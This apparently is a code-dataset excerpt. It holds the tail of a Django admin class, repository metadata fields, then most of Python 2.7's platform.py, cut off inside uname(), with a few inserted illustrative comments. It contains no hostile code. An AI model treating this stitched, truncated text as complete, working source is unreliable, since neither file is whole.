def returned_(self, instance: SearchQuery) -> str:
"""Return number of hits returned in the page."""
if instance.page_size == 0:
return "-"
return "%i - %i" % (instance.page_from, instance.page_to)
returned_.short_description = "Page returned" # type: ignore
def hits_(self, instance: SearchQuery) -> str:
"""Return pretty version of hits JSON."""
return pprint(instance.hits)
def aggregations_(self, instance: SearchQuery) -> str:
"""Return pretty version of aggregations JSON."""
return pprint(instance.aggregations)
admin.site.register(SearchQuery, SearchQueryAdmin)
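# --- illustration (not part of the original module) ---
# pprint() above indents the JSON, then swaps whitespace for HTML, so
# {"a": 1} renders as:
#   <code>{<br>&nbsp;&nbsp;&nbsp;&nbsp;"a":&nbsp;1<br>}</code>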
|
mit
| -1,682,509,719,301,585,000
| 32.028302
| 88
| 0.619823
| false
| 4.094737
| false
| false
| false
|
kubaszostak/gdal-dragndrop
|
osgeo/apps/Python27/Lib/platform.py
|
1
|
53234
|
#!/usr/bin/env python
""" This module tries to retrieve as much platform-identifying data as
possible. It makes this information available via function APIs.
If called from the command line, it prints the platform
information concatenated as single string to stdout. The output
format is useable as part of a filename.
"""
# This module is maintained by Marc-Andre Lemburg <mal@egenix.com>.
# If you find problems, please submit bug reports/patches via the
# Python bug tracker (http://bugs.python.org) and assign them to "lemburg".
#
# Note: Please keep this module compatible to Python 1.5.2.
#
# Still needed:
# * more support for WinCE
# * support for MS-DOS (PythonDX ?)
# * support for Amiga and other still unsupported platforms running Python
# * support for additional Linux distributions
#
# Many thanks to all those who helped adding platform-specific
# checks (in no particular order):
#
# Charles G Waldman, David Arnold, Gordon McMillan, Ben Darnell,
# Jeff Bauer, Cliff Crawford, Ivan Van Laningham, Josef
# Betancourt, Randall Hopper, Karl Putland, John Farrell, Greg
# Andruk, Just van Rossum, Thomas Heller, Mark R. Levinson, Mark
# Hammond, Bill Tutt, Hans Nowak, Uwe Zessin (OpenVMS support),
# Colin Kong, Trent Mick, Guido van Rossum, Anthony Baxter, Steve
# Dower
#
# History:
#
# <see CVS and SVN checkin messages for history>
#
# 1.0.8 - changed Windows support to read version from kernel32.dll
# 1.0.7 - added DEV_NULL
# 1.0.6 - added linux_distribution()
# 1.0.5 - fixed Java support to allow running the module on Jython
# 1.0.4 - added IronPython support
# 1.0.3 - added normalization of Windows system name
# 1.0.2 - added more Windows support
# 1.0.1 - reformatted to make doc.py happy
# 1.0.0 - reformatted a bit and checked into Python CVS
# 0.8.0 - added sys.version parser and various new access
# APIs (python_version(), python_compiler(), etc.)
# 0.7.2 - fixed architecture() to use sizeof(pointer) where available
# 0.7.1 - added support for Caldera OpenLinux
# 0.7.0 - some fixes for WinCE; untabified the source file
# 0.6.2 - support for OpenVMS - requires version 1.5.2-V006 or higher and
# vms_lib.getsyi() configured
# 0.6.1 - added code to prevent 'uname -p' on platforms which are
# known not to support it
# 0.6.0 - fixed win32_ver() to hopefully work on Win95,98,NT and Win2k;
# did some cleanup of the interfaces - some APIs have changed
# 0.5.5 - fixed another typo in the MacOS code... should have
# used more coffee today ;-)
# 0.5.4 - fixed a few typos in the MacOS code
# 0.5.3 - added experimental MacOS support; added better popen()
# workarounds in _syscmd_ver() -- still not 100% elegant
# though
# 0.5.2 - fixed uname() to return '' instead of 'unknown' in all
# return values (the system uname command tends to return
# 'unknown' instead of just leaving the field empty)
# 0.5.1 - included code for slackware dist; added exception handlers
# to cover up situations where platforms don't have os.popen
# (e.g. Mac) or fail on socket.gethostname(); fixed libc
# detection RE
# 0.5.0 - changed the API names referring to system commands to *syscmd*;
# added java_ver(); made syscmd_ver() a private
# API (was system_ver() in previous versions) -- use uname()
# instead; extended the win32_ver() to also return processor
# type information
# 0.4.0 - added win32_ver() and modified the platform() output for WinXX
# 0.3.4 - fixed a bug in _follow_symlinks()
# 0.3.3 - fixed popen() and "file" command invocation bugs
# 0.3.2 - added architecture() API and support for it in platform()
# 0.3.1 - fixed syscmd_ver() RE to support Windows NT
# 0.3.0 - added system alias support
# 0.2.3 - removed 'wince' again... oh well.
# 0.2.2 - added 'wince' to syscmd_ver() supported platforms
# 0.2.1 - added cache logic and changed the platform string format
# 0.2.0 - changed the API to use functions instead of module globals
# since some action take too long to be run on module import
# 0.1.0 - first release
#
# You can always get the latest version of this module at:
#
# http://www.egenix.com/files/python/platform.py
#
# If that URL should fail, try contacting the author.
__copyright__ = """
Copyright (c) 1999-2000, Marc-Andre Lemburg; mailto:mal@lemburg.com
Copyright (c) 2000-2010, eGenix.com Software GmbH; mailto:info@egenix.com
Permission to use, copy, modify, and distribute this software and its
documentation for any purpose and without fee or royalty is hereby granted,
provided that the above copyright notice appear in all copies and that
both that copyright notice and this permission notice appear in
supporting documentation or portions thereof, including modifications,
that you make.
EGENIX.COM SOFTWARE GMBH DISCLAIMS ALL WARRANTIES WITH REGARD TO
THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS, IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL,
INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING
FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
WITH THE USE OR PERFORMANCE OF THIS SOFTWARE !
"""
__version__ = '1.0.7'
import sys,string,os,re
### Globals & Constants
# Determine the platform's /dev/null device
try:
DEV_NULL = os.devnull
except AttributeError:
# os.devnull was added in Python 2.4, so emulate it for earlier
# Python versions
if sys.platform in ('dos','win32','win16','os2'):
# Use the old CP/M NUL as device name
DEV_NULL = 'NUL'
else:
# Standard Unix uses /dev/null
DEV_NULL = '/dev/null'
### Platform specific APIs
_libc_search = re.compile(r'(__libc_init)'
'|'
'(GLIBC_([0-9.]+))'
'|'
'(libc(_\w+)?\.so(?:\.(\d[0-9.]*))?)')
def libc_ver(executable=sys.executable,lib='',version='',
chunksize=2048):
""" Tries to determine the libc version that the file executable
(which defaults to the Python interpreter) is linked against.
Returns a tuple of strings (lib,version) which default to the
given parameters in case the lookup fails.
Note that the function has intimate knowledge of how different
libc versions add symbols to the executable and thus is probably
only useable for executables compiled using gcc.
The file is read and scanned in chunks of chunksize bytes.
"""
if hasattr(os.path, 'realpath'):
# Python 2.2 introduced os.path.realpath(); it is used
# here to work around problems with Cygwin not being
# able to open symlinks for reading
executable = os.path.realpath(executable)
f = open(executable,'rb')
binary = f.read(chunksize)
pos = 0
while 1:
m = _libc_search.search(binary,pos)
if not m:
binary = f.read(chunksize)
if not binary:
break
pos = 0
continue
libcinit,glibc,glibcversion,so,threads,soversion = m.groups()
if libcinit and not lib:
lib = 'libc'
elif glibc:
if lib != 'glibc':
lib = 'glibc'
version = glibcversion
elif glibcversion > version:
version = glibcversion
elif so:
if lib != 'glibc':
lib = 'libc'
if soversion and soversion > version:
version = soversion
if threads and version[-len(threads):] != threads:
version = version + threads
pos = m.end()
f.close()
return lib,version
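# --- illustration (not part of the original module) ---
# What the _libc_search pattern above extracts from typical embedded strings:
#   '__libc_init' -> matches the plain libc marker (first alternative)
#   'GLIBC_2.12'  -> glibcversion = '2.12'        (second alternative)
#   'libc.so.6'   -> soversion = '6'              (third alternative)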
def _dist_try_harder(distname,version,id):
""" Tries some special tricks to get the distribution
information in case the default method fails.
Currently supports older SuSE Linux, Caldera OpenLinux and
Slackware Linux distributions.
"""
if os.path.exists('/var/adm/inst-log/info'):
# SuSE Linux stores distribution information in that file
info = open('/var/adm/inst-log/info').readlines()
distname = 'SuSE'
for line in info:
tv = string.split(line)
if len(tv) == 2:
tag,value = tv
else:
continue
if tag == 'MIN_DIST_VERSION':
version = string.strip(value)
elif tag == 'DIST_IDENT':
values = string.split(value,'-')
id = values[2]
return distname,version,id
if os.path.exists('/etc/.installed'):
# Caldera OpenLinux has some infos in that file (thanks to Colin Kong)
info = open('/etc/.installed').readlines()
for line in info:
pkg = string.split(line,'-')
if len(pkg) >= 2 and pkg[0] == 'OpenLinux':
# XXX does Caldera support non Intel platforms ? If yes,
# where can we find the needed id ?
return 'OpenLinux',pkg[1],id
if os.path.isdir('/usr/lib/setup'):
# Check for slackware version tag file (thanks to Greg Andruk)
verfiles = os.listdir('/usr/lib/setup')
for n in range(len(verfiles)-1, -1, -1):
if verfiles[n][:14] != 'slack-version-':
del verfiles[n]
if verfiles:
verfiles.sort()
distname = 'slackware'
version = verfiles[-1][14:]
return distname,version,id
return distname,version,id
_release_filename = re.compile(r'(\w+)[-_](release|version)')
_lsb_release_version = re.compile(r'(.+)'
' release '
'([\d.]+)'
'[^(]*(?:\((.+)\))?')
_release_version = re.compile(r'([^0-9]+)'
'(?: release )?'
'([\d.]+)'
'[^(]*(?:\((.+)\))?')
# See also http://www.novell.com/coolsolutions/feature/11251.html
# and http://linuxmafia.com/faq/Admin/release-files.html
# and http://data.linux-ntfs.org/rpm/whichrpm
# and http://www.die.net/doc/linux/man/man1/lsb_release.1.html
_supported_dists = (
'SuSE', 'debian', 'fedora', 'redhat', 'centos',
'mandrake', 'mandriva', 'rocks', 'slackware', 'yellowdog', 'gentoo',
'UnitedLinux', 'turbolinux')
def _parse_release_file(firstline):
# Default to empty 'version' and 'id' strings. Both defaults are used
# when 'firstline' is empty. 'id' defaults to empty when an id can not
# be deduced.
version = ''
id = ''
# Parse the first line
m = _lsb_release_version.match(firstline)
if m is not None:
# LSB format: "distro release x.x (codename)"
return tuple(m.groups())
# Pre-LSB format: "distro x.x (codename)"
m = _release_version.match(firstline)
if m is not None:
return tuple(m.groups())
# Unknown format... take the first two words
l = string.split(string.strip(firstline))
if l:
version = l[0]
if len(l) > 1:
id = l[1]
return '', version, id
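# --- illustration (not part of the original module) ---
# What _parse_release_file() yields for a few representative first lines:
#   'Fedora release 8 (Werewolf)' -> ('Fedora', '8', 'Werewolf')      # LSB format
#   'CentOS 5.2 (Final)'          -> ('CentOS ', '5.2', 'Final')     # pre-LSB
#   'something unexpected'        -> ('', 'something', 'unexpected')  # fallback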
def linux_distribution(distname='', version='', id='',
supported_dists=_supported_dists,
full_distribution_name=1):
""" Tries to determine the name of the Linux OS distribution name.
The function first looks for a distribution release file in
/etc and then reverts to _dist_try_harder() in case no
suitable files are found.
supported_dists may be given to define the set of Linux
distributions to look for. It defaults to a list of currently
supported Linux distributions identified by their release file
name.
If full_distribution_name is true (default), the full
distribution read from the OS is returned. Otherwise the short
name taken from supported_dists is used.
Returns a tuple (distname,version,id) which default to the
args given as parameters.
"""
try:
etc = os.listdir('/etc')
except os.error:
# Probably not a Unix system
return distname,version,id
etc.sort()
for file in etc:
m = _release_filename.match(file)
if m is not None:
_distname,dummy = m.groups()
if _distname in supported_dists:
distname = _distname
break
else:
return _dist_try_harder(distname,version,id)
# Read the first line
f = open('/etc/'+file, 'r')
firstline = f.readline()
f.close()
_distname, _version, _id = _parse_release_file(firstline)
if _distname and full_distribution_name:
distname = _distname
if _version:
version = _version
if _id:
id = _id
return distname, version, id
# To maintain backwards compatibility:
def dist(distname='',version='',id='',
supported_dists=_supported_dists):
""" Tries to determine the name of the Linux OS distribution name.
The function first looks for a distribution release file in
/etc and then reverts to _dist_try_harder() in case no
suitable files are found.
Returns a tuple (distname,version,id) which default to the
args given as parameters.
"""
return linux_distribution(distname, version, id,
supported_dists=supported_dists,
full_distribution_name=0)
class _popen:
""" Fairly portable (alternative) popen implementation.
This is mostly needed in case os.popen() is not available, or
doesn't work as advertised, e.g. in Win9X GUI programs like
PythonWin or IDLE.
Writing to the pipe is currently not supported.
"""
tmpfile = ''
pipe = None
bufsize = None
mode = 'r'
def __init__(self,cmd,mode='r',bufsize=None):
if mode != 'r':
raise ValueError,'popen()-emulation only supports read mode'
import tempfile
self.tmpfile = tmpfile = tempfile.mktemp()
os.system(cmd + ' > %s' % tmpfile)
self.pipe = open(tmpfile,'rb')
self.bufsize = bufsize
self.mode = mode
def read(self):
return self.pipe.read()
def readlines(self):
if self.bufsize is not None:
return self.pipe.readlines()
def close(self,
remove=os.unlink,error=os.error):
if self.pipe:
rc = self.pipe.close()
else:
rc = 255
if self.tmpfile:
try:
remove(self.tmpfile)
except error:
pass
return rc
# Alias
__del__ = close
def popen(cmd, mode='r', bufsize=None):
""" Portable popen() interface.
"""
# Find a working popen implementation preferring win32pipe.popen
# over os.popen over _popen
popen = None
if os.environ.get('OS','') == 'Windows_NT':
# On NT win32pipe should work; on Win9x it hangs due to bugs
# in the MS C lib (see MS KnowledgeBase article Q150956)
try:
import win32pipe
except ImportError:
pass
else:
popen = win32pipe.popen
if popen is None:
if hasattr(os,'popen'):
popen = os.popen
# Check whether it works... it doesn't in GUI programs
# on Windows platforms
if sys.platform == 'win32': # XXX Others too ?
try:
popen('')
except os.error:
popen = _popen
else:
popen = _popen
if bufsize is None:
return popen(cmd,mode)
else:
return popen(cmd,mode,bufsize)
def _norm_version(version, build=''):
""" Normalize the version and build strings and return a single
version string using the format major.minor.build (or patchlevel).
"""
l = string.split(version,'.')
if build:
l.append(build)
try:
ints = map(int,l)
except ValueError:
strings = l
else:
strings = map(str,ints)
version = string.join(strings[:3],'.')
return version
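# --- illustration (not part of the original module) ---
#   _norm_version('5.00.2195')   -> '5.0.2195'   (zeros normalized via int())
#   _norm_version('6.0', '6002') -> '6.0.6002'   (build appended)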
_ver_output = re.compile(r'(?:([\w ]+) ([\w.]+) '
'.*'
'\[.* ([\d.]+)\])')
# Examples of VER command output:
#
# Windows 2000: Microsoft Windows 2000 [Version 5.00.2195]
# Windows XP: Microsoft Windows XP [Version 5.1.2600]
# Windows Vista: Microsoft Windows [Version 6.0.6002]
#
# Note that the "Version" string gets localized on different
# Windows versions.
def _syscmd_ver(system='', release='', version='',
supported_platforms=('win32','win16','dos','os2')):
""" Tries to figure out the OS version used and returns
a tuple (system,release,version).
It uses the "ver" shell command for this which is known
to exist on Windows, DOS and OS/2. XXX Others too ?
In case this fails, the given parameters are used as
defaults.
"""
if sys.platform not in supported_platforms:
return system,release,version
# Try some common cmd strings
for cmd in ('ver','command /c ver','cmd /c ver'):
try:
pipe = popen(cmd)
info = pipe.read()
if pipe.close():
raise os.error,'command failed'
# XXX How can I suppress shell errors from being written
# to stderr ?
except os.error,why:
#print 'Command %s failed: %s' % (cmd,why)
continue
except IOError,why:
#print 'Command %s failed: %s' % (cmd,why)
continue
else:
break
else:
return system,release,version
# Parse the output
info = string.strip(info)
m = _ver_output.match(info)
if m is not None:
system,release,version = m.groups()
# Strip trailing dots from version and release
if release[-1] == '.':
release = release[:-1]
if version[-1] == '.':
version = version[:-1]
# Normalize the version and build strings (eliminating additional
# zeros)
version = _norm_version(version)
return system,release,version
_WIN32_CLIENT_RELEASES = {
(5, 0): "2000",
(5, 1): "XP",
# Strictly, 5.2 client is XP 64-bit, but platform.py historically
# has always called it 2003 Server
(5, 2): "2003Server",
(5, None): "post2003",
(6, 0): "Vista",
(6, 1): "7",
(6, 2): "8",
(6, 3): "8.1",
(6, None): "post8.1",
(10, 0): "10",
(10, None): "post10",
}
# Server release name lookup will default to client names if necessary
_WIN32_SERVER_RELEASES = {
(5, 2): "2003Server",
(6, 0): "2008Server",
(6, 1): "2008ServerR2",
(6, 2): "2012Server",
(6, 3): "2012ServerR2",
(6, None): "post2012ServerR2",
}
def _get_real_winver(maj, min, build):
if maj < 6 or (maj == 6 and min < 2):
return maj, min, build
from ctypes import (c_buffer, POINTER, byref, create_unicode_buffer,
Structure, WinDLL, _Pointer)
from ctypes.wintypes import DWORD, HANDLE
class VS_FIXEDFILEINFO(Structure):
_fields_ = [
("dwSignature", DWORD),
("dwStrucVersion", DWORD),
("dwFileVersionMS", DWORD),
("dwFileVersionLS", DWORD),
("dwProductVersionMS", DWORD),
("dwProductVersionLS", DWORD),
("dwFileFlagsMask", DWORD),
("dwFileFlags", DWORD),
("dwFileOS", DWORD),
("dwFileType", DWORD),
("dwFileSubtype", DWORD),
("dwFileDateMS", DWORD),
("dwFileDateLS", DWORD),
]
class PVS_FIXEDFILEINFO(_Pointer):
_type_ = VS_FIXEDFILEINFO
kernel32 = WinDLL('kernel32')
version = WinDLL('version')
# We will immediately double the length up to MAX_PATH, but the
# path may be longer, so we retry until the returned string is
# shorter than our buffer.
name_len = actual_len = 130
while actual_len == name_len:
name_len *= 2
name = create_unicode_buffer(name_len)
actual_len = kernel32.GetModuleFileNameW(HANDLE(kernel32._handle),
name, len(name))
if not actual_len:
return maj, min, build
size = version.GetFileVersionInfoSizeW(name, None)
if not size:
return maj, min, build
ver_block = c_buffer(size)
if (not version.GetFileVersionInfoW(name, None, size, ver_block) or
not ver_block):
return maj, min, build
pvi = PVS_FIXEDFILEINFO()
if not version.VerQueryValueW(ver_block, "", byref(pvi), byref(DWORD())):
return maj, min, build
maj = pvi.contents.dwProductVersionMS >> 16
min = pvi.contents.dwProductVersionMS & 0xFFFF
build = pvi.contents.dwProductVersionLS >> 16
return maj, min, build
def win32_ver(release='', version='', csd='', ptype=''):
try:
from sys import getwindowsversion
except ImportError:
return release, version, csd, ptype
try:
from winreg import OpenKeyEx, QueryValueEx, CloseKey, HKEY_LOCAL_MACHINE
except ImportError:
from _winreg import OpenKeyEx, QueryValueEx, CloseKey, HKEY_LOCAL_MACHINE
winver = getwindowsversion()
maj, min, build = _get_real_winver(*winver[:3])
version = '{0}.{1}.{2}'.format(maj, min, build)
release = (_WIN32_CLIENT_RELEASES.get((maj, min)) or
_WIN32_CLIENT_RELEASES.get((maj, None)) or
release)
    # getwindowsversion() reflects the compatibility mode Python is
    # running under, and so the service pack value is only going to be
    # valid if the versions match.
if winver[:2] == (maj, min):
try:
csd = 'SP{}'.format(winver.service_pack_major)
except AttributeError:
if csd[:13] == 'Service Pack ':
csd = 'SP' + csd[13:]
# VER_NT_SERVER = 3
if getattr(winver, 'product_type', None) == 3:
release = (_WIN32_SERVER_RELEASES.get((maj, min)) or
_WIN32_SERVER_RELEASES.get((maj, None)) or
release)
key = None
try:
key = OpenKeyEx(HKEY_LOCAL_MACHINE,
r'SOFTWARE\Microsoft\Windows NT\CurrentVersion')
ptype = QueryValueEx(key, 'CurrentType')[0]
except:
pass
finally:
if key:
CloseKey(key)
return release, version, csd, ptype
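# Illustrative only: on a hypothetical Windows 7 SP1 machine this returns
# something like ('7', '6.1.7601', 'SP1', 'Multiprocessor Free'); actual
# values depend on the installed OS and on the registry lookup above.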
def _mac_ver_lookup(selectors,default=None):
from gestalt import gestalt
import MacOS
l = []
append = l.append
for selector in selectors:
try:
append(gestalt(selector))
except (RuntimeError, MacOS.Error):
append(default)
return l
def _bcd2str(bcd):
return hex(bcd)[2:]
def _mac_ver_gestalt():
"""
Thanks to Mark R. Levinson for mailing documentation links and
code examples for this function. Documentation for the
gestalt() API is available online at:
http://www.rgaros.nl/gestalt/
"""
# Check whether the version info module is available
try:
import gestalt
import MacOS
except ImportError:
return None
# Get the infos
sysv,sysa = _mac_ver_lookup(('sysv','sysa'))
# Decode the infos
if sysv:
major = (sysv & 0xFF00) >> 8
minor = (sysv & 0x00F0) >> 4
patch = (sysv & 0x000F)
if (major, minor) >= (10, 4):
            # the 'sysv' gestalt cannot return patchlevels
# higher than 9. Apple introduced 3 new
# gestalt codes in 10.4 to deal with this
# issue (needed because patch levels can
# run higher than 9, such as 10.4.11)
major,minor,patch = _mac_ver_lookup(('sys1','sys2','sys3'))
release = '%i.%i.%i' %(major, minor, patch)
else:
release = '%s.%i.%i' % (_bcd2str(major),minor,patch)
if sysa:
machine = {0x1: '68k',
0x2: 'PowerPC',
0xa: 'i386'}.get(sysa,'')
versioninfo=('', '', '')
return release,versioninfo,machine
def _mac_ver_xml():
fn = '/System/Library/CoreServices/SystemVersion.plist'
if not os.path.exists(fn):
return None
try:
import plistlib
except ImportError:
return None
pl = plistlib.readPlist(fn)
release = pl['ProductVersion']
versioninfo=('', '', '')
machine = os.uname()[4]
if machine in ('ppc', 'Power Macintosh'):
# for compatibility with the gestalt based code
machine = 'PowerPC'
return release,versioninfo,machine
def mac_ver(release='',versioninfo=('','',''),machine=''):
""" Get MacOS version information and return it as tuple (release,
versioninfo, machine) with versioninfo being a tuple (version,
dev_stage, non_release_version).
Entries which cannot be determined are set to the parameter values
which default to ''. All tuple entries are strings.
"""
# First try reading the information from an XML file which should
# always be present
info = _mac_ver_xml()
if info is not None:
return info
# If that doesn't work for some reason fall back to reading the
# information using gestalt calls.
info = _mac_ver_gestalt()
if info is not None:
return info
# If that also doesn't work return the default values
return release,versioninfo,machine
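# Illustrative only: on a hypothetical OS X 10.8.2 box this returns
# something like ('10.8.2', ('', '', ''), 'x86_64'); both lookup paths
# above leave the middle versioninfo tuple empty.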
def _java_getprop(name,default):
from java.lang import System
try:
value = System.getProperty(name)
if value is None:
return default
return value
except AttributeError:
return default
def java_ver(release='',vendor='',vminfo=('','',''),osinfo=('','','')):
""" Version interface for Jython.
Returns a tuple (release,vendor,vminfo,osinfo) with vminfo being
a tuple (vm_name,vm_release,vm_vendor) and osinfo being a
tuple (os_name,os_version,os_arch).
Values which cannot be determined are set to the defaults
given as parameters (which all default to '').
"""
# Import the needed APIs
try:
import java.lang
except ImportError:
return release,vendor,vminfo,osinfo
vendor = _java_getprop('java.vendor', vendor)
release = _java_getprop('java.version', release)
vm_name, vm_release, vm_vendor = vminfo
vm_name = _java_getprop('java.vm.name', vm_name)
vm_vendor = _java_getprop('java.vm.vendor', vm_vendor)
vm_release = _java_getprop('java.vm.version', vm_release)
vminfo = vm_name, vm_release, vm_vendor
os_name, os_version, os_arch = osinfo
os_arch = _java_getprop('java.os.arch', os_arch)
os_name = _java_getprop('java.os.name', os_name)
os_version = _java_getprop('java.os.version', os_version)
osinfo = os_name, os_version, os_arch
return release, vendor, vminfo, osinfo
### System name aliasing
def system_alias(system,release,version):
""" Returns (system,release,version) aliased to common
marketing names used for some systems.
It also does some reordering of the information in some cases
where it would otherwise cause confusion.
"""
if system == 'Rhapsody':
# Apple's BSD derivative
# XXX How can we determine the marketing release number ?
return 'MacOS X Server',system+release,version
elif system == 'SunOS':
# Sun's OS
if release < '5':
# These releases use the old name SunOS
return system,release,version
# Modify release (marketing release = SunOS release - 3)
l = string.split(release,'.')
if l:
try:
major = int(l[0])
except ValueError:
pass
else:
major = major - 3
l[0] = str(major)
release = string.join(l,'.')
if release < '6':
system = 'Solaris'
else:
# XXX Whatever the new SunOS marketing name is...
system = 'Solaris'
elif system == 'IRIX64':
# IRIX reports IRIX64 on platforms with 64-bit support; yet it
# is really a version and not a different platform, since 32-bit
        # apps are also supported.
system = 'IRIX'
if version:
version = version + ' (64bit)'
else:
version = '64bit'
elif system in ('win32','win16'):
# In case one of the other tricks
system = 'Windows'
return system,release,version
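# A worked example of the SunOS re-mapping above (hypothetical input):
# system_alias('SunOS', '5.8', 'Generic_108528-15') returns
# ('Solaris', '2.8', 'Generic_108528-15'); releases below '5' keep the
# plain SunOS name.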
### Various internal helpers
def _platform(*args):
""" Helper to format the platform string in a filename
compatible format e.g. "system-version-machine".
"""
# Format the platform string
platform = string.join(
map(string.strip,
filter(len, args)),
'-')
# Cleanup some possible filename obstacles...
replace = string.replace
platform = replace(platform,' ','_')
platform = replace(platform,'/','-')
platform = replace(platform,'\\','-')
platform = replace(platform,':','-')
platform = replace(platform,';','-')
platform = replace(platform,'"','-')
platform = replace(platform,'(','-')
platform = replace(platform,')','-')
# No need to report 'unknown' information...
platform = replace(platform,'unknown','')
# Fold '--'s and remove trailing '-'
while 1:
cleaned = replace(platform,'--','-')
if cleaned == platform:
break
platform = cleaned
while platform[-1] == '-':
platform = platform[:-1]
return platform
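# Illustrative only: _platform('Windows', '7', '6.1.7601', 'SP1') yields
# 'Windows-7-6.1.7601-SP1'; empty components are filtered out before the
# join and 'unknown' values are blanked by the cleanup above.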
def _node(default=''):
""" Helper to determine the node name of this machine.
"""
try:
import socket
except ImportError:
# No sockets...
return default
try:
return socket.gethostname()
except socket.error:
# Still not working...
return default
# os.path.abspath is new in Python 1.5.2:
if not hasattr(os.path,'abspath'):
def _abspath(path,
isabs=os.path.isabs,join=os.path.join,getcwd=os.getcwd,
normpath=os.path.normpath):
if not isabs(path):
path = join(getcwd(), path)
return normpath(path)
else:
_abspath = os.path.abspath
def _follow_symlinks(filepath):
""" In case filepath is a symlink, follow it until a
real file is reached.
"""
filepath = _abspath(filepath)
while os.path.islink(filepath):
filepath = os.path.normpath(
os.path.join(os.path.dirname(filepath),os.readlink(filepath)))
return filepath
def _syscmd_uname(option,default=''):
""" Interface to the system's uname command.
"""
if sys.platform in ('dos','win32','win16','os2'):
# XXX Others too ?
return default
try:
f = os.popen('uname %s 2> %s' % (option, DEV_NULL))
except (AttributeError,os.error):
return default
output = string.strip(f.read())
rc = f.close()
if not output or rc:
return default
else:
return output
def _syscmd_file(target,default=''):
""" Interface to the system's file command.
The function uses the -b option of the file command to have it
        omit the filename in its output and, if possible, the -L option
to have the command follow symlinks. It returns default in
case the command should fail.
"""
# We do the import here to avoid a bootstrap issue.
# See c73b90b6dadd changeset.
#
# [..]
# ranlib libpython2.7.a
# gcc -o python \
# Modules/python.o \
# libpython2.7.a -lsocket -lnsl -ldl -lm
# Traceback (most recent call last):
# File "./setup.py", line 8, in <module>
# from platform import machine as platform_machine
# File "[..]/build/Lib/platform.py", line 116, in <module>
# import sys,string,os,re,subprocess
# File "[..]/build/Lib/subprocess.py", line 429, in <module>
# import select
# ImportError: No module named select
import subprocess
if sys.platform in ('dos','win32','win16','os2'):
# XXX Others too ?
return default
target = _follow_symlinks(target)
try:
proc = subprocess.Popen(['file', target],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
except (AttributeError,os.error):
return default
output = proc.communicate()[0]
rc = proc.wait()
if not output or rc:
return default
else:
return output
### Information about the used architecture
# Default values for architecture; non-empty strings override the
# defaults given as parameters
_default_architecture = {
'win32': ('','WindowsPE'),
'win16': ('','Windows'),
'dos': ('','MSDOS'),
}
_architecture_split = re.compile(r'[\s,]').split
def architecture(executable=sys.executable,bits='',linkage=''):
""" Queries the given executable (defaults to the Python interpreter
binary) for various architecture information.
Returns a tuple (bits,linkage) which contains information about
the bit architecture and the linkage format used for the
executable. Both values are returned as strings.
Values that cannot be determined are returned as given by the
parameter presets. If bits is given as '', the sizeof(pointer)
        (or sizeof(long) on Python version < 1.5.2) is used as an
indicator for the supported pointer size.
The function relies on the system's "file" command to do the
actual work. This is available on most if not all Unix
platforms. On some non-Unix platforms where the "file" command
does not exist and the executable is set to the Python interpreter
binary defaults from _default_architecture are used.
"""
# Use the sizeof(pointer) as default number of bits if nothing
# else is given as default.
if not bits:
import struct
try:
size = struct.calcsize('P')
except struct.error:
# Older installations can only query longs
size = struct.calcsize('l')
bits = str(size*8) + 'bit'
# Get data from the 'file' system command
if executable:
output = _syscmd_file(executable, '')
else:
output = ''
if not output and \
executable == sys.executable:
# "file" command did not return anything; we'll try to provide
# some sensible defaults then...
if sys.platform in _default_architecture:
b, l = _default_architecture[sys.platform]
if b:
bits = b
if l:
linkage = l
return bits, linkage
# Split the output into a list of strings omitting the filename
fileout = _architecture_split(output)[1:]
if 'executable' not in fileout:
# Format not supported
return bits,linkage
# Bits
if '32-bit' in fileout:
bits = '32bit'
elif 'N32' in fileout:
# On Irix only
bits = 'n32bit'
elif '64-bit' in fileout:
bits = '64bit'
# Linkage
if 'ELF' in fileout:
linkage = 'ELF'
elif 'PE' in fileout:
# E.g. Windows uses this format
if 'Windows' in fileout:
linkage = 'WindowsPE'
else:
linkage = 'PE'
elif 'COFF' in fileout:
linkage = 'COFF'
elif 'MS-DOS' in fileout:
linkage = 'MSDOS'
else:
# XXX the A.OUT format also falls under this class...
pass
return bits,linkage
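# Illustrative only: on a typical 64-bit Linux build this returns something
# like ('64bit', 'ELF'); on Windows, where the 'file' command is missing,
# the fallback comes from the _default_architecture table above.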
### Portable uname() interface
_uname_cache = None
def uname():
""" Fairly portable uname interface. Returns a tuple
of strings (system,node,release,version,machine,processor)
identifying the underlying platform.
Note that unlike the os.uname function this also returns
possible processor information as an additional tuple entry.
Entries which cannot be determined are set to ''.
"""
global _uname_cache
no_os_uname = 0
if _uname_cache is not None:
return _uname_cache
processor = ''
# Get some infos from the builtin os.uname API...
try:
system,node,release,version,machine = os.uname()
except AttributeError:
no_os_uname = 1
if no_os_uname or not filter(None, (system, node, release, version, machine)):
        # Hmm, there is either no uname or uname has returned
        # 'unknowns'... we'll have to poke around the system then.
if no_os_uname:
system = sys.platform
release = ''
version = ''
node = _node()
machine = ''
use_syscmd_ver = 1
# Try win32_ver() on win32 platforms
if system == 'win32':
release,version,csd,ptype = win32_ver()
if release and version:
use_syscmd_ver = 0
# Try to use the PROCESSOR_* environment variables
# available on Win XP and later; see
# http://support.microsoft.com/kb/888731 and
# http://www.geocities.com/rick_lively/MANUALS/ENV/MSWIN/PROCESSI.HTM
if not machine:
# WOW64 processes mask the native architecture
if "PROCESSOR_ARCHITEW6432" in os.environ:
machine = os.environ.get("PROCESSOR_ARCHITEW6432", '')
else:
machine = os.environ.get('PROCESSOR_ARCHITECTURE', '')
if not processor:
processor = os.environ.get('PROCESSOR_IDENTIFIER', machine)
# Try the 'ver' system command available on some
# platforms
if use_syscmd_ver:
system,release,version = _syscmd_ver(system)
# Normalize system to what win32_ver() normally returns
# (_syscmd_ver() tends to return the vendor name as well)
if system == 'Microsoft Windows':
system = 'Windows'
elif system == 'Microsoft' and release == 'Windows':
# Under Windows Vista and Windows Server 2008,
# Microsoft changed the output of the ver command. The
# release is no longer printed. This causes the
# system and release to be misidentified.
system = 'Windows'
if '6.0' == version[:3]:
release = 'Vista'
else:
release = ''
# In case we still don't know anything useful, we'll try to
# help ourselves
if system in ('win32','win16'):
if not version:
if system == 'win32':
version = '32bit'
else:
version = '16bit'
